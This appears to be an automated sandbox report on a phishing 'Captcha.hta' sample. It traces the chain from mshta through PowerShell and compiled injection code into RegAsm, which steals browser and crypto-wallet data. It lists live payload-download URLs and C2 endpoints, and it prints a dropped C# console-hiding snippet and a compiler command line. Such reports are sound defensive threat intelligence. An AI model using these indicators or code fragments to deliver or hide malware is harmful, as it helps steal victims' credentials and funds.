              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1573516 Sample: Captcha.hta Startdate: 12/12/2024 Architecture: WINDOWS Score: 100 39 zinc-sneark.biz 2->39 41 formy-spill.biz 2->41 43 3 other IPs or domains 2->43 61 Suricata IDS alerts for network traffic 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 16 other signatures 2->67 9 mshta.exe 1 2->9         started        12 svchost.exe 1 1 2->12         started        signatures3 process4 dnsIp5 75 Detected Cobalt Strike Beacon 9->75 77 Suspicious powershell command line found 9->77 79 Bypasses PowerShell execution policy 9->79 15 powershell.exe 15 33 9->15         started        47 127.0.0.1 unknown unknown 12->47 signatures6 process7 dnsIp8 49 45.131.135.227, 49732, 80 RACKMARKTES Spain 15->49 51 147.45.44.131, 49734, 80 FREE-NET-ASFREEnetEU Russian Federation 15->51 33 C:\Users\user\AppData\Local\...\mvgjodmb.0.cs, Unicode 15->33 dropped 35 C:\Users\user\AppData\...\2pzvj5lc.cmdline, Unicode 15->35 dropped 53 Writes to foreign memory regions 15->53 55 Suspicious execution chain found 15->55 57 Compiles code for process injection (via .Net compiler) 15->57 59 Injects a PE file into a foreign processes 15->59 20 RegAsm.exe 15->20         started        24 csc.exe 3 15->24         started        27 csc.exe 1 15->27         started        29 conhost.exe 15->29         started        file9 signatures10 process11 dnsIp12 45 covery-mover.biz 172.67.206.64, 443, 49737, 49738 CLOUDFLARENETUS United States 20->45 69 Query firmware table information (likely to detect VMs) 20->69 71 Tries to harvest and steal browser information (history, passwords, etc) 20->71 73 Tries to steal Crypto Currency Wallets 20->73 37 C:\Users\user\AppData\Local\...\mvgjodmb.dll, PE32 24->37 dropped 31 cvtres.exe 1 24->31         started        file13 signatures14 process15

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Captcha.hta13%ReversingLabsWin32.Phishing.HTMLPhisher

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.dll100%AviraHEUR/AGEN.1300034
              C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.dll100%Joe Sandbox ML

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              covery-mover.biz100%URL Reputationmalware
              zinc-sneark.biz100%URL Reputationmalware
              dwell-exclaim.biz100%URL Reputationmalware
              formy-spill.biz100%URL Reputationmalware

              URLs

              SourceDetectionScannerLabelLink
              http://147.45.44.131/infopage/ung0.exe0%Avira URL Cloudsafe
              https://covery-mover.biz:443/api100%Avira URL Cloudmalware
              http://45.131.135.227/tbhy.ps10%Avira URL Cloudsafe
              http://147.45.44.131/infopage/bhg8.exe0%Avira URL Cloudsafe
              http://45.131.1380%Avira URL Cloudsafe
              https://covery-mover.biz/apia100%Avira URL Cloudmalware
              https://covery-mover.biz/apid100%Avira URL Cloudmalware
              http://45.131.135.2270%Avira URL Cloudsafe
              https://covery-mover.biz/100%Avira URL Cloudmalware
              http://147.45.44.1310%Avira URL Cloudsafe
              https://covery-mover.biz/apie.100%Avira URL Cloudmalware
              https://covery-mover.biz/D100%Avira URL Cloudmalware
              https://covery-mover.biz/api100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              covery-mover.biz
              		172.67.206.64
              		truetrue
              • 100%, URL Reputation
              		unknown
              se-blurry.biz
              		unknown
              		unknownfalse
                		high
                zinc-sneark.biz
                		unknown
                		unknowntrue
                • 100%, URL Reputation
                		unknown
                dwell-exclaim.biz
                		unknown
                		unknowntrue
                • 100%, URL Reputation
                		unknown
                formy-spill.biz
                		unknown
                		unknowntrue
                • 100%, URL Reputation
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                dare-curbys.bizfalse
                  		high
                  impend-differ.bizfalse
                    		high
                    covery-mover.bizfalse
                      		high
                      http://45.131.135.227/tbhy.ps1true
                      • Avira URL Cloud: safe
                      		unknown
                      dwell-exclaim.bizfalse
                        		high
                        http://147.45.44.131/infopage/bhg8.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://covery-mover.biz/apitrue
                        • Avira URL Cloud: malware
                        		unknown
                        zinc-sneark.bizfalse
                          		high
                          formy-spill.bizfalse
                            		high
                            se-blurry.bizfalse
                              		high
                              print-vexer.bizfalse
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1789783027.000000000614A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://covery-mover.biz/RegAsm.exe, 00000007.00000002.1983377456.0000000000E0D000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1781632412.0000000005236000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1781632412.0000000005236000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://go.micropowershell.exe, 00000001.00000002.1781632412.00000000058BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://147.45.44.131/infopage/ung0.exepowershell.exe, 00000001.00000002.1781632412.00000000055E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://contoso.com/Licensepowershell.exe, 00000001.00000002.1789783027.000000000614A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Iconpowershell.exe, 00000001.00000002.1789783027.000000000614A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://crl.ver)svchost.exe, 00000003.00000002.2911202163.0000027EE4A11000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://g.live.com/odclientsettings/ProdV2.C:edb.log.3.drfalse
                                                		high
                                                http://45.131.135.227mshta.exe, 00000000.00000003.1679927373.000000000082A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1680851940.000000000082A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1677082981.0000000000829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1676018400.000000000081E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781632412.0000000005236000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781632412.0000000005A00000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://covery-mover.biz/apiaRegAsm.exe, 00000007.00000002.1983377456.0000000000E0D000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://45.131.138powershell.exe, 00000001.00000002.1781632412.0000000005A00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://covery-mover.biz/apidRegAsm.exe, 00000007.00000002.1983377456.0000000000E23000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1781632412.0000000005236000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://covery-mover.biz:443/apiRegAsm.exe, 00000007.00000002.1983377456.0000000000DAD000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://147.45.44.131powershell.exe, 00000001.00000002.1781632412.000000000546C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781632412.00000000055E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://covery-mover.biz/apie.RegAsm.exe, 00000007.00000002.1983377456.0000000000E23000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://g.live.com/odclientsettings/Prod.C:edb.log.3.drfalse
                                                    		high
                                                    https://g.live.com/odclientsettings/ProdV2edb.log.3.drfalse
                                                      		high
                                                      https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000003.00000003.1674729958.0000027EE4CE2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.drfalse
                                                        		high
                                                        https://aka.ms/pscore6lBdqpowershell.exe, 00000001.00000002.1781632412.00000000050E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://contoso.com/powershell.exe, 00000001.00000002.1789783027.000000000614A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1789783027.000000000614A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://covery-mover.biz/DRegAsm.exe, 00000007.00000002.1983377456.0000000000E23000.00000004.00000020.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1781632412.00000000050E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000003.00000003.1674729958.0000027EE4CE2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  147.45.44.131
                                                                  		unknownRussian Federation
                                                                  		2895FREE-NET-ASFREEnetEUfalse
                                                                  172.67.206.64
                                                                  		covery-mover.bizUnited States
                                                                  		13335CLOUDFLARENETUStrue
                                                                  45.131.135.227
                                                                  		unknownSpain
                                                                  		197518RACKMARKTEStrue

                                                                  Private

                                                                  IP
                                                                  127.0.0.1

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1573516
                                                                  Start date and time:2024-12-12 07:51:11 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 6m 3s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:12
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:Captcha.hta
                                                                  Detection:MAL
                                                                  Classification:mal100.phis.troj.spyw.expl.evad.winHTA@13/18@5/4
                                                                  EGA Information:
                                                                  • Successful, ratio: 66.7%
                                                                  HCA Information:
                                                                  • Successful, ratio: 96%
                                                                  • Number of executed functions: 46
                                                                  • Number of non-executed functions: 52
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .hta

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 2.18.109.164, 4.175.87.197, 13.107.246.63
                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target mshta.exe, PID 7156 because there are no executed function
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  01:52:02API Interceptor2x Sleep call for process: svchost.exe modified
                                                                  01:52:02API Interceptor45x Sleep call for process: powershell.exe modified
                                                                  01:52:13API Interceptor7x Sleep call for process: RegAsm.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  147.45.44.131EBUdultKh7.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 147.45.44.131/infopage/vsom.exe
                                                                  MiJZ3z4t5K.exeGet hashmaliciousUnknownBrowse
                                                                  • 147.45.44.131/infopage/Tom.exe
                                                                  ZjH6H6xqo7.exeGet hashmaliciousLummaCBrowse
                                                                  • 147.45.44.131/infopage/tvh53.exe
                                                                  nlJ2sNaZVi.exeGet hashmaliciousLummaCBrowse
                                                                  • 147.45.44.131/infopage/tbh75.exe
                                                                  TZ33WZy6QL.exeGet hashmaliciousLummaCBrowse
                                                                  • 147.45.44.131/infopage/tbg9.exe
                                                                  7IXl1M9JGV.exeGet hashmaliciousLummaCBrowse
                                                                  • 147.45.44.131/infopage/tbg9.exe
                                                                  7IXl1M9JGV.exeGet hashmaliciousUnknownBrowse
                                                                  • 147.45.44.131/infopage/bhdh552.ps1
                                                                  Rechnung_643839483.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                  • 147.45.44.131/infopage/cdeea.exe
                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                  • 147.45.44.131/files/gqgqg.exe
                                                                  AS5AB7c08n.exeGet hashmaliciousMicroClipBrowse
                                                                  • 147.45.44.131/files/tpgl053.exe
                                                                  172.67.206.64https://update-download.transfernow.net/dl/20240625xVCUV6maGet hashmaliciousHTMLPhisherBrowse
                                                                    https://link.sbstck.com/redirect/07cc7c38-01c9-45b4-adfb-583529674442?j=eyJ1IjoiM3l4NDRuIn0.hIfuke8RAzj-gbQmS59B61RAw2SA19eZRoxzpvNlDOUGet hashmaliciousHtmlDropper, HTMLPhisherBrowse

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      covery-mover.bizwa6qrGANga.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.58.186
                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.58.186

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUSmalware.ps1Get hashmaliciousMassLogger RATBrowse
                                                                      • 104.21.67.152
                                                                      https://analytics-prd.aws.wehaa.net/trackings?value=1&action=click&category=external&origin=detailpage&url=http://notifix.info/scales/ec49f59be146f69f3ea00c211d5cccd90524b2cf7f8aec665534fc020c910734b9e18d0945bd518a0e55b407c5bf7443cf6179/paige_williams@newyorker.com&cat=firstpage&label_item_id=9633&label_owner_id=646&label_url=http://notifix.info/scales/ec49f59be146f69f3ea00c211d5cccd90524b2cf7f8aec665534fc020c910734b9e18d0945bd518a0e55b407c5bf7443cf6179/paige_williams@newyorker.com&idle=8d15bf95831b32126e4b3bd02a20cf592eade0e3442422aeaf0db14b2e91ae186a5549c468519863594ece59910ee541&tenant=minnesotastate.jobsGet hashmaliciousCaptcha PhishBrowse
                                                                      • 104.21.80.1
                                                                      https://analytics-prd.aws.wehaa.net/trackings?value=1&action=click&category=external&origin=detailpage&url=http://notifix.info/scales/0af634fca2eaf3a11c0597691f5616c7d16f5580d650d17201024b374ebe92a8e0c492c822b6be6f4332bb93acc2ba02298f78/christa_sgobba@condenast.com&cat=firstpage&label_item_id=9633&label_owner_id=646&label_url=http://notifix.info/scales/0af634fca2eaf3a11c0597691f5616c7d16f5580d650d17201024b374ebe92a8e0c492c822b6be6f4332bb93acc2ba02298f78/christa_sgobba@condenast.com&idle=8d15bf95831b32126e4b3bd02a20cf592eade0e3442422aeaf0db14b2e91ae186a5549c468519863594ece59910ee541&tenant=minnesotastate.jobsGet hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                      • 172.67.157.142
                                                                      REMITTANCE_10023Tdcj.htmlGet hashmaliciousUnknownBrowse
                                                                      • 104.17.25.14
                                                                      phish_alert_iocp_v1.4.48 - 2024-12-11T151927.331.emlGet hashmaliciousUnknownBrowse
                                                                      • 104.17.25.14
                                                                      SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                      • 172.67.176.240
                                                                      jew.ppc.elfGet hashmaliciousUnknownBrowse
                                                                      • 104.16.155.85
                                                                      Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 104.21.67.152
                                                                      https://newdocumentsproposal.webflow.io/Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                      • 172.64.151.8
                                                                      x86_64.elfGet hashmaliciousMiraiBrowse
                                                                      • 104.31.160.246
                                                                      RACKMARKTESfile.exeGet hashmaliciousPureCrypterBrowse
                                                                      • 185.226.181.36
                                                                      file.exeGet hashmaliciousPureCrypterBrowse
                                                                      • 185.226.181.36
                                                                      vOoy27ZG1Y.msiGet hashmaliciousUnknownBrowse
                                                                      • 185.228.72.101
                                                                      Aqua.x86.elfGet hashmaliciousUnknownBrowse
                                                                      • 45.147.248.7
                                                                      Aqua.arm7.elfGet hashmaliciousMiraiBrowse
                                                                      • 45.147.248.7
                                                                      6.HTA.htaGet hashmaliciousUnknownBrowse
                                                                      • 185.228.72.84
                                                                      x86_64-20231212-1319.elfGet hashmaliciousMiraiBrowse
                                                                      • 185.214.108.250
                                                                      Adobe_Acrobate_Reader_Pro-HAv70.msiGet hashmaliciousMetamorfoBrowse
                                                                      • 185.228.72.212
                                                                      Word_comprob_33690014194.HTAGet hashmaliciousUnknownBrowse
                                                                      • 185.228.72.84
                                                                      ReF_comprobante_85523364312723157089271.HTA.htaGet hashmaliciousUnknownBrowse
                                                                      • 185.228.72.84
                                                                      FREE-NET-ASFREEnetEUEBUdultKh7.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 147.45.44.131
                                                                      arm5.elfGet hashmaliciousUnknownBrowse
                                                                      • 193.233.202.23
                                                                      Wh2c6sgwRo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      • 147.45.47.151
                                                                      installer.exeGet hashmaliciousUnknownBrowse
                                                                      • 193.233.254.0
                                                                      installer.exeGet hashmaliciousUnknownBrowse
                                                                      • 193.233.254.0
                                                                      MiJZ3z4t5K.exeGet hashmaliciousUnknownBrowse
                                                                      • 147.45.44.131
                                                                      tyhkamwdmrg.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 147.45.47.81
                                                                      kyhjasehs.exeGet hashmaliciousDCRatBrowse
                                                                      • 147.45.47.156
                                                                      fkydjyhjadg.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 147.45.47.81
                                                                      KBKHHYI29L.msiGet hashmaliciousAmadeyBrowse
                                                                      • 147.45.47.167

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      a0e9f5d64349fb13191bc781f81f42e1FSCPlugin06.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.206.64
                                                                      freebienotes.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.206.64
                                                                      FreebieNotes.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.206.64
                                                                      FreebieNotes.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.206.64
                                                                      FreebieNotes.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.206.64
                                                                      xeroxscan.DocxGet hashmaliciousUnknownBrowse
                                                                      • 172.67.206.64
                                                                      EBUdultKh7.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.206.64

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1310720
                                                                      Entropy (8bit):1.3073548855100423
                                                                      Encrypted:false
                                                                      SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr5:KooCEYhgYEL0In
                                                                      MD5:31E7CFD20C06EFDFFEB5AE3D2AE18E29
                                                                      SHA1:DD3CD32810F111A82DA41A6ED7487F79ACAF55CD
                                                                      SHA-256:BED0562E4E768D25CA5EDAF597CC7CEA3B9984C8F0914FD8262DB59786DB921A
                                                                      SHA-512:7881888FF9A949C860C69718BC8C4BE83726D59060312C70D196BEC85400A505C3D751F40C9A5DB337A5149E35033CA994DAA28898C166FF176A478F2DF57334
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xa0e1ccf8, page size 16384, DirtyShutdown, Windows version 10.0
                                                                      Category:dropped
                                                                      Size (bytes):1310720
                                                                      Entropy (8bit):0.42215881938694255
                                                                      Encrypted:false
                                                                      SSDEEP:1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
                                                                      MD5:510F24F9F305E24A866F047B4D138FC4
                                                                      SHA1:F3042505CD10A8C6CBE68F8232250C5FC2F2507D
                                                                      SHA-256:A628896627EED6403DCC38C2B4CFFC8E67C87FAB7D942D1C69918E6902B68B5D
                                                                      SHA-512:C6122803F3C4429EB3885CCC0B6D31CC8F9ECC7B8F0120254F217FC669F0C5A2B4718AEB98704E5EFCF7623C09573C0F7217DC29B0BAB049F06348CC640CF646
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:....... .......A.......X\...;...{......................0.!..........{A..4...|c.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................:....4...|.................... h.4...|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):16384
                                                                      Entropy (8bit):0.07661025767302912
                                                                      Encrypted:false
                                                                      SSDEEP:3:zlyYeQT3zuhajn13a/01RjpellAllcVO/lnlZMxZNQl:zlyzySha53qOY/AOewk
                                                                      MD5:DEEFAABB7698FC7EC8F5CD9BC897F376
                                                                      SHA1:9968554939065B1FC45DB420DA225DFAEBB1027A
                                                                      SHA-256:8C0C222864838BDC546D9B16A8ABB4A09F68138CF9D412B31E1D3A50079FD8FA
                                                                      SHA-512:B3231603AFCB4326F8559C10DAF3D119D37EF4DC7BAFC5DA7C222C3534C8BC02709BD52BF6CB8A56C981A64F84CA4B945448891B8999B8AA320E36FA4B76BF28
                                                                      Malicious:false
                                                                      Preview:.M.j.....................................;...{...4...|.......{A..............{A......{A..........{A].................. h.4...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):1.1510207563435464
                                                                      Encrypted:false
                                                                      SSDEEP:3:NlllulPki/llllZ:NllUcylll
                                                                      MD5:D8D47FD6FA3E199E4AFF68B91F1D04A8
                                                                      SHA1:788625E414B030E5174C5BE7262A4C93502C2C21
                                                                      SHA-256:2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
                                                                      SHA-512:5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
                                                                      Malicious:false
                                                                      Preview:@...e.................................^..............@..........

                                                                      C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.0.cs

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):484
                                                                      Entropy (8bit):4.844739520818714
                                                                      Encrypted:false
                                                                      SSDEEP:6:V/DsDrSW/eM/s62SRbXFWx/1XQM/s62SRvoSok2SRyE2SxYqdYnm4cwCS+en:V/DGr7TDbVW91XdDvoOcuYnmiCM
                                                                      MD5:FEFBA9C7AE0D93708317C3D74298F4FF
                                                                      SHA1:92FB7CD5FA4B3E885906E7863783D899ED777FEB
                                                                      SHA-256:7E7246D00754EB5C87A1296D7031FA401C217F74E3FAA4954E5D1E0B63DE0EC6
                                                                      SHA-512:5CC1E0F1974CAD1B34463C2EDFC49FE637E57EE78C441CCE6ACA3C0B11C2C3876A8D0BB39B38BE0AF434B5122F5015AAD4597FEE44F80624ABD9BC56266C0B9B
                                                                      Malicious:false
                                                                      Preview:.using System;..using System.Runtime.InteropServices;..public class Window {.. [DllImport("user32.dll")].. public static extern int FindWindow(string lpClassName, string lpWindowName);.. [DllImport("user32.dll")].. public static extern int ShowWindow(int hwnd, int nCmdShow);.. public static extern bool IsWindowVisible(int hwnd);.. public static void HideConsole() {.. var handle = FindWindow(null, Console.Title);.. ShowWindow(handle, 0);.. }..}

                                                                      C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):369
                                                                      Entropy (8bit):5.288318049323857
                                                                      Encrypted:false
                                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fy5Zzxs7+AEszIwkn23fy5E:p37Lvkmb6KRfq5ZWZEifq5E
                                                                      MD5:664BE2B6E5F336546B873F8C7A296DB6
                                                                      SHA1:4B1CFC96197E2110250BD42D14A0B1C4E88B557F
                                                                      SHA-256:DBEBDDE021D35D661247E015B26C18DBC6693AF0A86B5F962E8BD589EFABCE9A
                                                                      SHA-512:03E9DA19CDEF3808FF642F348DCE5093AC7F0871E5E55741229D08B54DA1DC8549D1714688D492C5282E5BFBC7FFD2966E1815EFE3D685862B071F5B27CD195D
                                                                      Malicious:true
                                                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.0.cs"

                                                                      C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.out

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                                                      Category:modified
                                                                      Size (bytes):1150
                                                                      Entropy (8bit):5.295363871114836
                                                                      Encrypted:false
                                                                      SSDEEP:24:KJBqd3ka6KRfq5+Eifq5RKax5DqBVKVrdFAMBJTrfq5lX4gFG8s4:Cika6CNEu8K2DcVKdBJXWXFFG8s4
                                                                      MD5:E6947604B894C5EAA23492DEE8B06D41
                                                                      SHA1:2BABA680E7335112E28D1E46EDF0DF7ADEEF73DF
                                                                      SHA-256:8EC5B1E48792CC071132B12AFA6C2D862D4D14AFAB0C61B93CB42D65033EFE24
                                                                      SHA-512:C3A3A99D63D84129C8E3DF97AF20B9790FB12492082299ACCE2A824AAD45464F5D9619821860BE3D87D7BCA9E391A3D646142FE69E98FAD37E9137F55DA596B8
                                                                      Malicious:false
